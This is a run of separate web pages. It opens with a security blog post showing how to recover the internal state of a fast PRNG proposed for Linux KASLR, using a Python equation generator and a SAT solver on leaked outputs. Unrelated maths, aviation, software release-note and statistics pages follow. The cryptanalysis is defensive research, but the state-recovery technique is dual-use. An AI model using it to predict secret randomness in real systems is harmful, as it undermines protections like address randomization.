https://www.kryptoslogic.com/blog/2020/03/another-look-at-two-linux-kaslr-patches/

# A fast pseudorandom generator for KASLR
A recent patchset proposed for Linux KASLR not only randomizes the kernel base address, but also reorders every function at boot time. As such, it no longer suffices to leak an arbitrary kernel function pointer, or so the logic goes.
Along with this patchset came a custom random number generator intended to be as fast as possible, so as to keep the boot time overhead at a minimum:
```c
/*
 * 64bit variant of Bob Jenkins' public domain PRNG
 * 256 bits of internal state
 */
struct prng_state {
    u64 a, b, c, d;
};

static struct prng_state state;
static bool initialized;

#define rot(x, k) (((x)<<(k))|((x)>>(64-(k))))

static u64 prng_u64(struct prng_state *x)
{
    u64 e;

    e    = x->a - rot(x->b, 7);
    x->a = x->b ^ rot(x->c, 13);
    x->b = x->c + rot(x->d, 37);
    x->c = x->d + e;
    x->d = e + x->a;

    return x->d;
}

static void prng_init(struct prng_state *state)
{
    int i;

    state->a = kaslr_get_random_seed(NULL);
    state->b = kaslr_get_random_seed(NULL);
    state->c = kaslr_get_random_seed(NULL);
    state->d = kaslr_get_random_seed(NULL);

    for (i = 0; i < 30; ++i)
        (void)prng_u64(state);

    initialized = true;
}

unsigned long kaslr_get_prandom_long(void)
{
    if (!initialized)
        prng_init(&state);

    return prng_u64(&state);
}
```
This was quickly decried as dangerous, and as Andy Lutomirski puts it,
> Ugh, don’t do this. Use a real DRBG. Someone is going to break the
> construction in your patch just to prove they can.
>
> ChaCha20 is a good bet.
In the end, this random number generator was quickly removed, and that was that.
But one can still wonder—is this generator secure but unanalyzed, or would it have been broken just to prove a point?
# Bob Jenkins’s Small PRNG
The above generator was, as per the comment, derived from one of Bob Jenkins’s small-state generators [1]. It is, in particular, the following “three rotation 64-bit variant”:
```c
typedef unsigned long long u8;

typedef struct ranctx {
    u8 a;
    u8 b;
    u8 c;
    u8 d;
} ranctx;

#define rot(x,k) (((x)<<(k))|((x)>>(64-(k))))

u8 ranval( ranctx *x ) {
    u8 e = x->a - rot(x->b, 7);
    x->a = x->b ^ rot(x->c, 13);
    x->b = x->c + rot(x->d, 37);
    x->c = x->d + e;
    x->d = e + x->a;
    return x->d;
}

void raninit( ranctx *x, u8 seed ) {
    u8 i;
    x->a = 0xf1ea5eed, x->b = x->c = x->d = seed;
    for (i=0; i<20; ++i) {
        (void)ranval(x);
    }
}
```
The core consists of the iteration of a permutation; we can easily compute its inverse iteration as
```c
u8 ranval_inverse( ranctx *x ) {
    u8 e = x->d - x->a;
    x->d = x->c - e;
    x->c = x->b - rot(x->d, 37);
    x->b = x->a ^ rot(x->c, 13);
    x->a = e + rot(x->b, 7);
    return x->d;
}
```
The core permutation present in ranval is depicted below.
This resembles a Type-3 Feistel network [2], with some added operations for extra diffusion. Nevertheless, the resemblance still means that there are relatively few changes from one state to the next.
The mode of operation, in modern terms, looks pretty much like a sponge pseudorandom generator with a capacity of 192 bits and a rate of 64 bits. As such, an ideal permutation in this mode of operation should be indistinguishable from a random stream until approximately $2^{96}$ captured 64-bit words.
## Analysis
There are several ways to try and attack a pseudorandom generator:
• We can try and find a bias in its output stream;
• We can try to find a weakness in its initialization;
• We can try to recover an intermediate state from its output;
• Many more…
Our approach here will be the third one. The initialization, with its 20 rounds (or 30 in the KASLR version), is unlikely to have easily exploitable properties. Finding a bias in the output stream seems feasible, but in practical terms it has rather limited applicability.
Because the permutation is rather simple, we will try to model the problem algebraically. This means representing the problem as a multivariate system of equations in $\mathbb{F}_2$, where $a \cdot b$ means bitwise and, and $a + b$ means bitwise xor. Since the permutation above consists only of a combination of additions, xors, and rotations, every operation is trivial to represent except addition (and subtraction).
Let $x, y$ and $z$ be 64-bit variables, and $x_i$ (resp. $y_i, z_i$) indicate the $i$th bit of $x$ (resp. $y, z$). One can represent 64-bit addition $z = x \boxplus_{64} y$ as a recursive system [3]:
\begin{align} z_0 &= x_0 + y_0 \newline c_0 &= x_0 \cdot y_0 \newline z_i &= x_i + y_i + c_{i-1} \newline c_i &= x_i \cdot y_i + c_{i-1} \cdot (x_i + y_i) \newline &= x_i \cdot y_i + c_{i-1} \cdot x_i + c_{i-1} \cdot y_i \end{align}
While this representation is quite simple, and can be represented purely as a function of the input bits, it is not good for analysis. This is because the algebraic degree, that is, the monomial $x_i x_j \dots y_k y_l \dots$ with the most elements can have up to 63 variables. Working with polynomials of such high degree is not practical, due to memory and computational requirements, and therefore we do the most common trick in the business—if the system is too complex, add new variables to make it simpler:
\begin{align} z_0 &= x_0 + y_0 \newline z_i &= x_i + y_i + x_{i-1}\cdot y_{i-1} + (z_{i-1} + x_{i-1} + y_{i-1})\cdot(x_{i-1} + y_{i-1}) \newline &= x_i + y_i + x_{i-1}\cdot y_{i-1} + z_{i-1}\cdot x_{i-1} + z_{i-1} \cdot y_{i-1} + x_{i-1} + y_{i-1} \end{align}
It is clear that this is equivalent to the above: since $z_i = x_i + y_i + c_{i-1}$, the carry satisfies $c_{i-1} = z_i + x_i + y_i$, and substituting this (at index $i-1$) into the recursion for the carry yields the expression above. We now add 64 extra variables for each addition, that is, the $z_i$ are actual variables in our equation system, but the algebraic degree remains 2.
The equation system for subtraction is the same as with addition, with a simple reordering of the variables. Alternatively, we can explicitly write it as
\begin{align} z_0 &= x_0 + y_0 \newline z_i &= x_i + y_i + (x_{i-1} + 1)\cdot y_{i-1} + (z_{i-1} + x_{i-1} + y_{i-1})\cdot((x_{i-1} + 1) + y_{i-1}) \newline &= x_i + y_i + x_{i-1}\cdot y_{i-1} + z_{i-1}\cdot x_{i-1} + z_{i-1}\cdot y_{i-1} + z_{i-1} + y_{i-1} \end{align}
Now it becomes quite straightforward to model the entire round as an equation system like above, reordering the equations such that it becomes a system of the form \begin{align} p_1(x_0,\dots) &= 0, \newline p_2(x_0,\dots) &= 0, \newline \dots & \newline p_l(x_0,\dots) &= 0, \newline \end{align} which we call the algebraic normal form, or ANF, of the system.
Below we present a Python script that does exactly this, receiving a number of output leaks as arguments:
```python
import sys

BITS = 64

def VAR(n=BITS):
    if not hasattr(VAR, "counter"):
        VAR.counter = 0
    t = [ VAR.counter + i for i in range(n) ]
    VAR.counter += n
    return t

def ROTL(x, c):
    z = x[:]
    for i in range(c):
        z = z[-1:] + z[0:-1]
    return z

# Model c = a ^ b
def XOR(c, a, b):
    for i in range(BITS):
        L.append('x{} + x{} + x{}'.format(c[i], a[i], b[i]))

# Model c = a + b
def ADD(c, a, b):
    L.append('x{} + x{} + x{}'.format(c[0], a[0], b[0]))
    for i in range(1,BITS):
        L.append('x{0} + x{1} + x{2} + x{3}*x{4} + x{3} + x{4} + x{3}*x{5} + x{4}*x{5}'.format(c[i], a[i], b[i], a[i-1], b[i-1], c[i-1]))

# Model c = a - b
def SUB(c, a, b):
    L.append('x{} + x{} + x{}'.format(c[0], a[0], b[0]))
    for i in range(1,BITS):
        L.append('x{0} + x{1} + x{2} + x{3}*x{4} + x{4} + x{5} + x{3}*x{5} + x{4}*x{5}'.format(c[i], a[i], b[i], a[i-1], b[i-1], c[i-1]))

def EQ(a, b):
    for i in range(BITS):
        L.append('x{} + {}'.format(a[i], (b >> i)&1))

L = []

a = VAR()
b = VAR()
c = VAR()
d = VAR()

D = int(sys.argv[1], 0)
EQ(d, D)

for i in range(2, len(sys.argv)):
    e = VAR()
    # e = a - ROTL(b, 7)
    SUB(e, a, ROTL(b, 7))
    # a = b ^ ROTL(c, 13)
    a_ = VAR()
    XOR(a_, b, ROTL(c, 13))
    # b = c + ROTL(d, 37)
    b_ = VAR()
    ADD(b_, c, ROTL(d, 37))
    # c = d + e
    c_ = VAR()
    ADD(c_, d, e)
    # d = e + a
    d_ = VAR()
    ADD(d_, e, a_)
    a, b, c, d = a_, b_, c_, d_
    D = int(sys.argv[i], 0)
    EQ(d, D)

print('\n'.join(L))
```
Having this system, we can solve it in two main ways: by computing a Gröbner basis of the system, or by converting it to conjunctive normal form (CNF) and handing it to a SAT solver.
We note that both Gröbner basis computation and boolean satisfiability are hard problems in the worst case; boolean satisfiability in particular is NP-complete. However, for small enough and simple enough systems, the heuristics used by good modern solvers make many of these problems tractable.
Although we tinkered with the first approach, the latter is both simpler to implement and more efficient. We also made use of the recent and quite convenient tool Bosphorus, which makes it straightforward to export a simplified CNF given an ANF equation system exported by our script above:
```
./bob 8 | xargs python bob.py > /tmp/test.anf &&
bosphorus -v 0 --simplify=1 --sat=0 --xldeg=3 --anfread /tmp/test.anf --cnfwrite /tmp/test.cnf &&
./cadical --unsat -q /tmp/test.cnf | python recover.py

Initial state:
0x512E276FCD97EE94 0xE5326BC5D9053F7F 0x4746014B33BEBC20 0x5012637EA2980D1E
0x512E276FCD97EE94 0xE5326BC5D9053F7F 0x4746014B33BEBC20 0x5012637EA2980D1E
```
In the above snippet, we use ./bob to generate a random state and leak 8 outputs, bob.py (the script above) to create the ANF from these leaks, bosphorus to convert the system to CNF, CaDiCaL [4] to solve the system, and recover.py to convert the output of cadical back to readable integer values.
The number of leaked values is significant to the recovery speed. The minimum number of consecutive leaks to have a unique solution is 4—the initial value of d plus 3 other leaks to constrain the $2^{192}$ possible initial state variables $a, b, c$ to a single value.
However, 4 leaks seems to make the problem quite hard for SAT solvers. If, instead, we use 5 leaks the problem becomes tractable. The more leaks we have, the faster it will be, until a certain point. We found, experimentally, that 8 leaks are the sweet spot for recovery time, with more leaks failing to speed things up.
The following table contains the solving speeds, on an Intel Core i7-4770, for various numbers of leaks, averaged over 100 runs:
| Leaked words | Average state recovery time (seconds) |
| --- | --- |
| 5 | 95 |
| 6 | 43 |
| 7 | 31 |
| 8 | 26 |
| 9 | 27 |
| 10 | 28 |
| 11 | 29 |
Thus, it is safe to say that this generator is not suitable for cryptographic purposes.
We also note that SMT solvers could have been used to make the instantiation of the problem simpler. However, this results in poorer solving performance, and the performance across SMT solvers fluctuates even more wildly than with our approach.
# Carried Away
And now for something completely different.
While looking through the KASLR code, we find a peculiar piece of code in kaslr_get_random_long, the function that is used to get random values for KASLR:
```c
unsigned long kaslr_get_random_long(const char *purpose)
{
#ifdef CONFIG_X86_64
    const unsigned long mix_const = 0x5d6008cbf3848dd3UL;
#else
    const unsigned long mix_const = 0x3f39e593UL;
#endif
    unsigned long raw, random = get_boot_seed();
    bool use_i8254 = true;

    debug_putstr(purpose);
    debug_putstr(" KASLR using");

    if (has_cpuflag(X86_FEATURE_RDRAND)) {
        debug_putstr(" RDRAND");
        if (rdrand_long(&raw)) {
            random ^= raw;
            use_i8254 = false;
        }
    }

    if (has_cpuflag(X86_FEATURE_TSC)) {
        debug_putstr(" RDTSC");
        raw = rdtsc();

        random ^= raw;
        use_i8254 = false;
    }

    if (use_i8254) {
        debug_putstr(" i8254");
        random ^= i8254();
    }

    /* Circular multiply for better bit diffusion */
    asm(_ASM_MUL "%3"
        : "=a" (random), "=d" (raw)
        : "a" (random), "rm" (mix_const));
    random += raw;

    debug_putstr("...\n");

    return random;
}
```
The random 32 or 64-bit word that is returned begins with a simple hash of the kernel build and boot information for the present kernel:
```c
/* Attempt to create a simple but unpredictable starting entropy. */
static unsigned long get_boot_seed(void)
{
    unsigned long hash = 0;

    hash = rotate_xor(hash, build_str, sizeof(build_str));
    hash = rotate_xor(hash, boot_params, sizeof(*boot_params));

    return hash;
}
```
After that, it depends on which CPU features are enabled:
• If rdrand is available, random is xored with its value. Under the assumption that rdrand works as advertised, this should result in a perfectly distributed value.
• If rdtsc is available, random is once again mixed in with the timestamp counter value. This is not as good an entropy source as rdrand, particularly since rdtsc is usually available system-wide.
• If all else fails, use the i8254 lower-resolution timer.
After doing all this mixing, and in particular if only timers are used, random values are likely to be highly biased—the most significant bits are likely to remain relatively static over time.
To convert this lopsided entropy into a uniformly distributed value, since 2013 the function ends with a “cyclic multiplication” to smooth things over:
```c
/* Circular multiply for better bit diffusion */
asm(_ASM_MUL "%3"
    : "=a" (random), "=d" (raw)
    : "a" (random), "rm" (mix_const));
random += raw;
```
In short, it computes the full product of random times 0x3f39e593 or 0x5d6008cbf3848dd3, and adds the upper bits (in raw) to the lower bits (in random). This ensures that all the bits are more or less equitably mixed.
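For reference, the same folding can be sketched in plain C for the 64-bit case. This is only an illustration, assuming a compiler that provides unsigned __int128; the kernel itself uses the inline assembly shown above.

```c
#include <stdint.h>

/* Multiply, then fold the high 64 bits of the product into the low 64 bits.
 * Note that the carry of the final addition is silently discarded, which is
 * the issue discussed below. */
static uint64_t circular_multiply(uint64_t random, uint64_t mix_const)
{
    unsigned __int128 product = (unsigned __int128)random * mix_const;
    uint64_t low  = (uint64_t)product;
    uint64_t high = (uint64_t)(product >> 64);

    return low + high;
}
```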
But there’s a problem. Two, in fact: one theoretical and one practical.
In theory, what is being attempted here is randomness extraction. There are two usual ways to accomplish this: using a strong hash function modeled as a random oracle, or using a universal hash function and the leftover hash lemma. Here we have neither, and it’s clear that the output only looks unbiased for a naive attacker who cannot simply (approximately) invert the transformation.
The practical issue is different: if the entropy we have is actually well-distributed (say, by using rdrand), then the cyclic multiplication makes it worse by creating many values that are simply unreachable. Why? Because the multiplication—as implemented here—is not bijective.
## Cyclic multiplication
Cyclic multiplication is best interpreted as multiplication modulo $2^n-1$, with lazy reduction. In other words,
$$a \otimes b = \begin{cases} 2^n-1 & \text{ if } a = 2^n-1 \newline a \times b \bmod (2^n-1) & \text{ otherwise. } \end{cases}$$
If $b$ is relatively prime to $2^n-1$, this operation is clearly invertible. Its implementation is simple, as well: $$a \otimes b = \left(a \times b \bmod 2^n\right) + \left\lfloor{\frac{a\times b}{2^n}}\right\rfloor \pmod{2^n - 1}\,.$$ This is exactly what was implemented above. But there is one problem—the sum may overflow. To keep correctness, the overflowing bit—the carry—must be added back to the result.
If the carry is not added, there are a number of values proportional to $b$ that will never be reached. In the case of $b = \text{0x3f39e593}$, there are around $2^{28}$ unreachable values—1 out of every 16. While this is not particularly concerning here, it is an unnecessary flaw and easily corrected.
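The effect is easy to reproduce at a reduced width. The sketch below is purely illustrative, not the kernel's code: it uses an 8-bit analogue of the folding with an arbitrarily chosen odd constant and counts how many of the 256 possible outputs are actually reachable when the carry is dropped.

```c
#include <stdint.h>
#include <stdio.h>

int main(void)
{
    const uint16_t mix = 0x93;   /* arbitrary odd 8-bit constant */
    uint8_t seen[256] = {0};
    unsigned reachable = 0;

    for (unsigned a = 0; a < 256; a++) {
        uint16_t product = (uint16_t)(a * mix);
        /* Fold the high byte into the low byte, dropping the carry. */
        uint8_t out = (uint8_t)((product & 0xff) + (product >> 8));
        if (!seen[out]) {
            seen[out] = 1;
            reachable++;
        }
    }

    printf("%u of 256 outputs are reachable without the carry\n", reachable);
    return 0;
}
```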
## Fixing it
The fix, now, becomes obvious: simply add the missing carry. This way the final transformation cannot harm a good uniform distribution, unlike before.
```c
/* Circular multiply for better bit diffusion */
asm("mul %2\n"
    "add %1, %0\n"
    "adc $0, %0"
    : "+a" (random), "=d" (raw)
    : "rm" (mix_const));
return random;

/* Alternatively, a more portable version... */
/* Codegen is equivalent to above in recent gcc/clang versions */

/* Circular multiply for better bit diffusion */
asm(_ASM_MUL "%3"
    : "=a" (random), "=d" (raw)
    : "a" (random), "rm" (mix_const));
random += raw;
random += random < raw;
return random;
```

1. To be clear, Bob Jenkins never claimed these generators were cryptographically secure. [return]
2. See page 2 of On Generalized Feistel Networks for an idea of what the various Feistel network variants look like. [return]
3. Remember, again, that we are working with individual bits and that $\cdot$ means and and $+$ means xor. [return]
4. Obviously, any SAT solver could have been used here; we used the one that maximized single-thread solving speed for our problem. [return]
https://tasks.illustrativemathematics.org/content-standards/1/OA/C/6/tasks/1084

$20 Dot Map

Alignments to Content Standards: 1.OA.C.6

Task

The attached graphic shows a map. You must get from start to finish by visiting three of the dots; at each dot you have to pay the specified number of dollars. If you have $20, can you get from start to finish and visit three dots?
Bonus Question #1: Can you find a way to get from start to finish and spend all $20? Can you find a way to get from start to finish and spend less than $20?
Bonus Question #2: How many different routes can you find from start to finish that go to three dots and cost $20 or less?
IM Commentary
The language for this task is written above a 1st grade reading level, so it will need to be introduced verbally by the teacher. This problem helps students to practice adding three numbers whose sum are 20 or less. It is an open-ended problem with many solutions. This problem would work well either as a whole group or students could work on it as individuals or pairs. If this problem is presented whole group, the teacher needs to blow the graphic up using an Elmo, Smart Board or overhead projector. If students are going to work on it in pairs they will need to be given print-outs of the graphic.
Solution
$$1 + 9 + 9 = 19$$
$$1 + 9 + 10 = 20$$
$$1 + 10 + 9 = 20$$

$$7 + 10 + 3 = 20$$

$$8 + 6 + 3 = 17$$

$$1 + 10 + 3 = 14$$
https://aviation.stackexchange.com/questions/25503/why-are-emergency-vehicles-needed-for-a-runway-excursion

# Why are emergency vehicles needed for a runway excursion?
When passenger jets have a runway excursion incident such as this one in Birmingham it is apparently common practice to send emergency services vehicles to the aircraft.
Why are emergency services vehicles necessary?
I would think the plane is more than capable of getting back onto the Tarmac, so why doesn't it?
• It is more than capable of getting back onto the Tarmac - really? What makes you think that? – Simon Feb 22 '16 at 20:58
• What you can't see is the wheels on the grass buried up to the bogies. The wheels are relatively narrow and not designed for "off road" use. 45 tons of aircraft will quickly sink it. Even if you could get enough power to move it, the manoeuvre will almost certainly cause a twisting moment on the undercarriage which it is just not designed to handle. Even assuming no twisting, the sudden lurch as it freed itself would likely damage the nose leg. I've seen a heavy jet on the grass. The only way to move it is to tow it. – Simon Feb 22 '16 at 21:28
• Here you can see how buried the wheels were. To answer your question about emergency services, imagine an hydraulic line had split and sprayed oil onto the hot brakes (it had just landed, and this has happened before). A fire starts. If the emergency services had not deployed, what would your question be now? – Simon Feb 22 '16 at 21:36
• In addition to the above, most of the equipment in that photo is airport based. They exist literally for this type of work - why WOULDN'T you use caution and involve them? – Dan Feb 22 '16 at 21:41
• @Dan Exactly. You have people trained in dealing with aircraft emergencies just sitting there. You might as well have them next to the aircraft instead of sipping tea on the other side of the field. – Zach Lipton Feb 22 '16 at 23:10
Why are emergency service vehicles necessary?
Something might have been damaged. What if something was and there is a fuel leak somewhere? Hydraulic leaks are also dangerous, and more likely as hydraulic lines run to the brakes and nose wheel steering. Better safe than sorry, so emergency services go check.
Sometimes, they also disembark passengers via the ladder if it looks like towing the aircraft to terminal will take too long and the aircraft is on unpaved surface where the mobile stairs have trouble going.
They can also help with moving the plane, especially on smaller airports that only have one runway and so have to close until the plane is moved away anyway.
I would think the plane is more than capable of getting back onto the Tarmac, so why doesn't it?
No, it isn't. Aircraft not designed for unpaved surface will usually sink in somewhat, especially if the ground is wet, and require a lot of power to pull out. Sometimes, the tow truck is enough to get it out, sometimes they have to put planks under the wheels and sometimes they have to get out hydraulic jacks or inflatable support bags.
Even if the plane did not dig in and is easy to move, providing the power with the engines is not a smart thing to do, because the engines will throw up dirt and stones that could damage them, other parts of the aircraft, or something else around. Tow truck is much better for that job.
Going off the runway can be pretty rough. It is not unlikely that a passenger got injured or part of the plane got damaged.
Going full throttle on the jets will rip up the dirt and grass and fling it everywhere. It will also put quite a bit of force onto the landing gear which already got a beating from going into the grass.
Much safer to tow it back. You can see the white towing vehicle in front of the plane.
• And even if the risk of someone being injured wasn't likely, you already have the emergency vehicles available so you lose nothing by sending them. Best case: Your crews get an impromptu drill and something to make their day more interesting. Worst case: you need them there ASAP as the aircraft bursts into flames. Either way, there's no downside to sending the emergency services instantly. – Jon Story Feb 25 '16 at 16:31
https://www.studypug.com/algebra-2/radical-functions-and-expressions/solving-radical-equations
Radical equations are equations that have variables stuck inside a radical. We will show you how to solve this type of equation in this lesson.
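For example, here is a typical radical equation solved with the standard technique of isolating the radical, squaring both sides, and then checking for extraneous roots (the particular equation is just an illustrative choice):

$\sqrt{x+3} = x - 3$

Squaring both sides gives $x + 3 = (x-3)^2 = x^2 - 6x + 9$, so $x^2 - 7x + 6 = (x-1)(x-6) = 0$, and the candidates are $x = 1$ and $x = 6$. Checking them in the original equation, $x = 6$ works ($\sqrt{9} = 3$), while $x = 1$ is extraneous ($\sqrt{4} = 2 \neq -2$), so the only solution is $x = 6$.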
http://martinerickson.blogspot.com/2012/07/lines-on-hyperbolic-paraboloid.html

## Saturday, July 7, 2012
### Lines on a Hyperbolic Paraboloid
A ruled surface has the property that through every point on the surface there is a straight line lying on the surface. Cylinders and cones are ruled surfaces. Another example is a hyperbolic paraboloid (a saddle surface). In fact, a hyperbolic paraboloid contains a pair of straight lines through any given point on it. Find equations of a pair of lines through the point $(1,2,3)$ on the hyperbolic paraboloid $z=y^2-x^2$. Prove that these are the only two such lines.
Solution: Remember that a line in space can be given in parametric form $x=x_0+\alpha t$, $y=y_0+\beta t$, $z=z_0+\gamma t$, where $x_0$, $y_0$, $z_0$, $\alpha$, $\beta$, $\gamma$ are constants, and $t \in \mathbf{R}$.
Let $x=1+t$, $y=2+t$. Then $z=(2+t)^2-(1+t)^2=3+2t.$ So we have a line $(x,y,z)=(1+t,2+t,3+2t)$. Similarly, let $x=1+t$, $y=2-t$. Then $z=(2-t)^2-(1+t)^2=3-6t.$ So we have a line $(x,y,z)=(1+t,2-t,3-6t)$.
We will prove that these are the only two lines on $z=y^2-x^2$ through $(1,2,3)$. Assume that $x=1+\alpha t$, $y=2+\beta t$. Then $z=(2+\beta t)^2-(1+ \alpha t)^2=4+4 \beta t + \beta^2 t^2 -1- 2 \alpha t - \alpha^2 t^2.$ In order for us to have a line, the coefficient of $t^2$ must be zero. Hence $\alpha^2=\beta^2$, and $\beta= \pm \alpha$. For definiteness, assume that $\alpha=1$. Then $\beta=\pm 1$, and we have the two cases above.
We could make the same kind of argument to show that given any point on the surface $z=y^2-x^2$, there are exactly two lines through the point and lying on the surface. But there is a method that renders the computations even easier. We make the change of variables $x=X-Y, \quad y=X+Y, \quad z=4Z.$ Then $4Z=(X+Y)^2-(X-Y)^2=X^2+2XY+Y^2-X^2-Y^2+2XY,$ and we obtain the particularly simple equation $Z=XY.$ The critical thing is that the change of variables is linear; lines are mapped to lines. In our problem, the point was $(1,2,3)$. Under the change of variables, this becomes $(\frac{3}{2},\frac{1}{2},\frac{3}{4})$. The lines that pass through this point and lie on the saddle surface have either $X$ or $Y$ constant: $(X,Y,Z)=\left(\frac{3}{2}+s,\frac{1}{2},\frac{3}{4}+\frac{1}{2}s\right) \quad \mbox{and} \quad (X,Y,Z)=\left(\frac{3}{2},\frac{1}{2}+t,\frac{3}{4}+\frac{3}{2}t\right).$ In general, the two lines passing through the point $(X_0,Y_0,Z_0)$ and lying on the surface $Z=XY$ are $(X,Y,Z)=(X_0+s,Y_0,Z_0+sY_0) \quad \mbox{and} \quad (X,Y,Z)=(X_0,Y_0+t,Z_0+tX_0).$ Thus we have two families of lines that rule the saddle surface. The lines in each family do not intersect because if two such lines intersected, the intersection point would be on three lines on the saddle surface. Furthermore, every pair of lines from different families intersect. For two such lines have equations $(X,Y,Z)=(X_1+s,Y_1,Z_1+sY_1) \quad \mbox{and} \quad (X,Y,Z)=(X_2,Y_2+t,Z_2+tX_2),$ and it is easy to see that the lines intersect at the point $(X_2,Y_1,X_2Y_1)$, when $s=X_2-X_1$ and $t=Y_1-Y_2$.
http://www.gafferhq.org/documentation/0.60.8.0/ReleaseNotes/0.57.3.0.html

# 0.57.3.0
## Fixes
• Viewer : Fixed a bug in the render control widget which caused the entire Viewer to fail if there was an error computing the metadata for an image.
• Arnold : Added workaround for Arnold bug which prevented interactive edits to quad light colour textures.
• CopyAttributes : Fixed bugs triggered by non-existent source locations. CopyAttributes now matches the behavior of CopyPrimitiveVariables : if the source location does not exist, nothing is copied and no error is caused.
• Viewer : Fixed bugs in the “Edit Tweaks…” menu item. The wrong ShaderTweaks node could be displayed for certain upstream configurations of nodes like CopyAttributes, ShuffleAttributes and MergeScenes.
• OSLCode : Removed string substitutions on code, so that symbols such as # can be used directly. Substitutions were of no use anyway, because they were not being applied in a suitable context.
• SceneAlgo : Fixed shaderTweaks() bugs that could cause the wrong node to be returned.
## API
• SceneAlgo : Added an attributeHistory() method which returns a computation history for one specific attribute.
https://frfly.wordpress.com/2019/02/09/polygons/

# polygons
The inputs for this example problem are the angle 174 and 360. When some number of 174s adds up to a multiple of 360, the program stops. In advance we do not know how many 174s will add up to how many 360s, but we want the first such total. This is the least common multiple of angle A (174) and 360.
LCM (A, 360)
174 has prime factors of 2 * 3 * 29
360 has prime factors of 2 * 2 * 2 * 3 * 3 * 5
the least common multiple is 360 * 29 = 10440.
we can substitute that into either side of the equation
$nA=360R$
$n*174 = 10440$
$10440 = 360*R$
to find that n = 60 and R = 29
The LCM can be figured in different ways. There is a famous method of Euclid, and Euler (no Eugene). There is an Excel function to do it. Sample VBA code can be downloaded. The simplest method conceptually is the same way the turtle does it, by adding angles one by one and testing the result.
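For reference, Euclid's method finds the LCM through the greatest common divisor. For the example inputs 174 and 360:

$360 = 2 \cdot 174 + 12, \quad 174 = 14 \cdot 12 + 6, \quad 12 = 2 \cdot 6 + 0, \quad \text{so } \gcd(174, 360) = 6$

$LCM(174, 360) = \frac{174 \cdot 360}{\gcd(174, 360)} = \frac{62640}{6} = 10440$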
Here is the brute-force way, with no advance knowledge of when the program will stop. The program stops when the turtle heading returns to its original position. I also have a second emergency stop at 361 which never comes into play usually. (*footnote – the examples in the group photo that look like folded ribbon were polygons that did not close until 360 lines were drawn but were forced into an early exit with ” If inc > 130 Then Exit Do”) (**footnote – if the turn angle A is an integer, the maximum number of lines to bring the heading back to start is 360.)
```
Sub poly_360(len_side As Double, angle As Double)
Dim inc As Integer
Do
turtle1.fd len_side
turtle1.left angle
inc = inc + 1
If inc > 361 Then Exit Do
Loop While (inc * angle) Mod 360 <> 0 ' the heading is back at its start when the total turn is a multiple of 360
End Sub
```
Here is a primitive LCM function based on the same method, not intended to be the final version. The angles are added one by one and the result divided by 360 looking for a remainder, breaking out when the remainder is zero. The VBA mod operator works accurately only with integers. I had some overflows on the multiplication. The function seems to work better when all is type Long.
```
Function LCM(A As Long, B As Long)
Dim n As Long
Dim result As Long
Dim remainder As Long
n = 0
Do
n = n + 1
result = n * A
remainder = result Mod B
Loop While remainder <> 0
LCM = result
End Function
```
Now the sub to draw the polygon can be taken back to its roots. The loop calculations can be removed, because we will know in advance how many lines will be drawn.
Text information labels are added after the drawing is complete.
```
Sub poly_1(angle As Double, n As Integer, len_side As Double)
Dim inc As Integer
For inc = 1 To n
turtle1.fd len_side
turtle1.left angle
Next inc
txt_h "A = " & angle, turtle1.x1, turtle1.y1, 0.125
txt_h "n = " & n, turtle1.x1, turtle1.y1 - 0.25, 0.125
txt_h "R = " & (angle * n / 360), turtle1.x1, turtle1.y1 - 0.5, 0.125
End Sub
```
The sub to call the poly can be fancy or plain. It can draw families of polygons. It can loop and draw a range of turning angles.
This particular one will draw all the polygons with total turns (R) = 29 of angles between 1 and 180.
```
Sub turtle_demo_16()
init_turtle
Dim inc As Integer
Dim n As Integer, R As Integer
Dim A As Long, B As Long
B = 360
For inc = 1 To 180
A = inc
n = LCM(A, B) / A
R = LCM(A, 360) / 360
If R = 29 Then
Debug.Print "LCM of " & A; " and " & B; " = " & LCM(A, B)
Debug.Print "A = " & A
Debug.Print "n = " & n
Debug.Print "R = " & R
Debug.Print " "
Call poly_1(CDbl(A), n, 1)
turtle1.x1 = turtle1.x1 + 5
End If
Next inc
End Sub
```
```
Sub turtle_demo_16()
init_turtle
Dim inc As Integer
Dim n As Integer, R As Integer
Dim A As Long, B As Long
B = 360
For inc = 160 To 181
A = inc
n = LCM(A, B) / A
R = LCM(A, 360) / 360
Call poly_1(CDbl(A), n, 1)
turtle1.x1 = turtle1.x1 + 1.1
Next inc
End Sub
```
$R<20$
http://stephens999.github.io/fiveMinuteStats/dirichlet.html

Last updated: 2019-03-31
# Overview
The purpose of this vignette is to introduce the Dirichlet distribution. You should be familiar with the Beta distribution since the Dirichlet can be thought of as a generalization of the Beta distribution.
If you want more details you could look at Wikipedia.
# The Dirichlet Distribution
You can think of the $$J$$-dimensional Dirichlet distribution as a distribution on probability vectors, $$q=(q_1,\dots,q_J)$$, whose elements are non-negative and sum to 1. It is perhaps the most commonly-used distribution for probability vectors, and plays a central role in Bayesian inference from multinomial data.
The Dirichlet distribution has $$J$$ parameters, $$\alpha_1,\dots,\alpha_J$$ that control the mean and variance of the distribution. If $$q \sim \text{Dirichlet}(\alpha_1,\dots,\alpha_J)$$ then:
• The expectation of $$q_j$$ is $$\alpha_j/(\alpha_1 + \dots + \alpha_J)$$.
• The variance of $$q_j$$ becomes smaller as the sum $$\sum_j \alpha_j$$ increases.
## As a generalization of the Beta distribution
The 2-dimensional Dirichlet distribution is essentially the Beta distribution. Specifically, let $$q=(q_1,q_2)$$. Then $$q \sim Dirichlet(\alpha_1,\alpha_2)$$ implies that $q_1 \sim \text{Beta}(\alpha_1,\alpha_2)$ and $$q_2 = 1-q_1$$.
## Other connections to the Beta distribution
More generally, the marginals of the Dirichlet distribution are also beta distributions.
That is, if $$q \sim \text{Dirichlet}(\alpha_1, \dots,\alpha_J)$$ then $$q_j \sim \text{Beta}(\alpha_j,\sum_{j' \neq j} \alpha_{j'})$$.
# Density
The density of the Dirichlet distribution is most conveniently written as $p(q | \alpha) = \frac{\Gamma(\alpha_1+\dots+\alpha_J)}{\Gamma(\alpha_1)\dots \Gamma(\alpha_J)}\prod_{j=1}^J q_j^{\alpha_j-1} \qquad (q_j \geq 0; \quad \sum_j q_j =1).$ where $$\Gamma$$ here denotes the gamma function.
Actually when writing the density this way, a little care needs to be taken to make things formally correct. Specifically, if you perform standard (Lebesgue) integration of this “density” over the $$J$$ dimensional space $$q_1,\dots, q_J$$ it integrates to 0, and not 1 as a density should. This problem is caused by the constraint that the $$q$$s must sum to 1, which means that the Dirichlet distribution is effectively a $$J-1$$-dimensional distribution and not a $$J$$ dimensional distribution.
